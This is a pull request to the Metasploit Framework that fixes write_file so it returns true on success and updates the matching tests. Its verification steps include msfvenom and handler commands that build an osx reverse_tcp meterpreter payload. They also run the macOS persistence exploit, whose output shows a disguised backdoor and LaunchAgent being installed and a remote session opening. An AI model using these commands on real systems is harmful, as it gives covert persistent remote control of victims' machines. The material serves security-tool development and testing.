### PR TITLE
Fix #15896, write_file should return true on success

### DIFF
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -444,6 +444,7 @@ module Msf::Post::File
         return _write_file_unix_shell(file_name, data)
       end
     end
+    true
   end
 
   #

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -446,6 +446,7 @@ module Msf::Post::File
         return _write_file_unix_shell(file_name, data)
       end
     end
+    true
   end
 
   #

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -436,13 +436,15 @@ module Msf::Post::File
     elsif session.respond_to? :shell_command_token
       if session.platform == 'windows'
         if _can_echo?(data)
-          return _win_ansi_write_file(file_name, data)
+          _win_ansi_write_file(file_name, data)
         else
-          return _win_bin_write_file(file_name, data)
+          _win_bin_write_file(file_name, data)
         end
       else
-        return _write_file_unix_shell(file_name, data)
+        _write_file_unix_shell(file_name, data)
       end
+    else
+      return false
     end
     true
   end

--- a/test/modules/post/test/file.rb
+++ b/test/modules/post/test/file.rb
@@ -78,9 +78,9 @@ class MetasploitModule < Msf::Post
 
     it 'should create text files' do
       rm_f(datastore['BaseFileName'])
-      write_file(datastore['BaseFileName'], 'foo')
-
-      file?(datastore['BaseFileName'])
+      ret = write_file(datastore['BaseFileName'], 'foo')
+      ret &&= file?(datastore['BaseFileName'])
+      ret
     end
 
     it 'should read the text we just wrote' do
@@ -156,10 +156,11 @@ class MetasploitModule < Msf::Post
     it 'should write binary data' do
       vprint_status "Writing #{binary_data.length} bytes"
       t = Time.now
-      write_file(datastore['BaseFileName'], binary_data)
+      ret = write_file(datastore['BaseFileName'], binary_data)
       vprint_status("Finished in #{Time.now - t}")
 
-      file_exist?(datastore['BaseFileName'])
+      ret &&= file_exist?(datastore['BaseFileName'])
+      ret
     end
 
     it 'should read the binary data we just wrote' do


### PR DESCRIPTION
Quick fix for https://github.com/rapid7/metasploit-framework/issues/15896 (and potentially any module that checks the return value of write_file)

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get an OSX meterpreter session:
- [x] `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o met`
- [x] Run the Post::File tests:
```
loadpath test/modules
use post/test/file
set SESSION -1
set VERBOSE true
run
```
- [ ] Run osx/local/persistence:
```
use exploit/osx/local/persistence
set SESSION -1
set DisablePayloadHandler true (you probably already have a handler)
set RUN_NOW true (this avoids having to restart the osx box)
run

***Before:
msf6 exploit(multi/handler) > use exploit/osx/local/persistence
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/local/persistence) > set SESSION -1
SESSION => -1
msf6 exploit(osx/local/persistence) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(osx/local/persistence) > set RUN_NOW true
RUN_NOW => true
msf6 exploit(osx/local/persistence) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: osx
[*] Dropping backdoor executable...
[-] Exploit aborted due to failure: unexpected-reply: Error dropping backdoor to /Users/user/Library/.IsptAOcB/com.system.update


***After:
msf6 exploit(osx/local/persistence) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: osx
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/user/Library/.mzXGpSRT/com.system.update
[+] LaunchAgent added: /Users/user/Library/LaunchAgents/com.system.update.plist
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810224 bytes) to 127.0.0.1
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/user/Library/.mzXGpSRT ; rm /Users/user/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

msf6 exploit(osx/local/persistence) > [*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:53582 ) at 2021-11-22 04:33:18 +0000

```
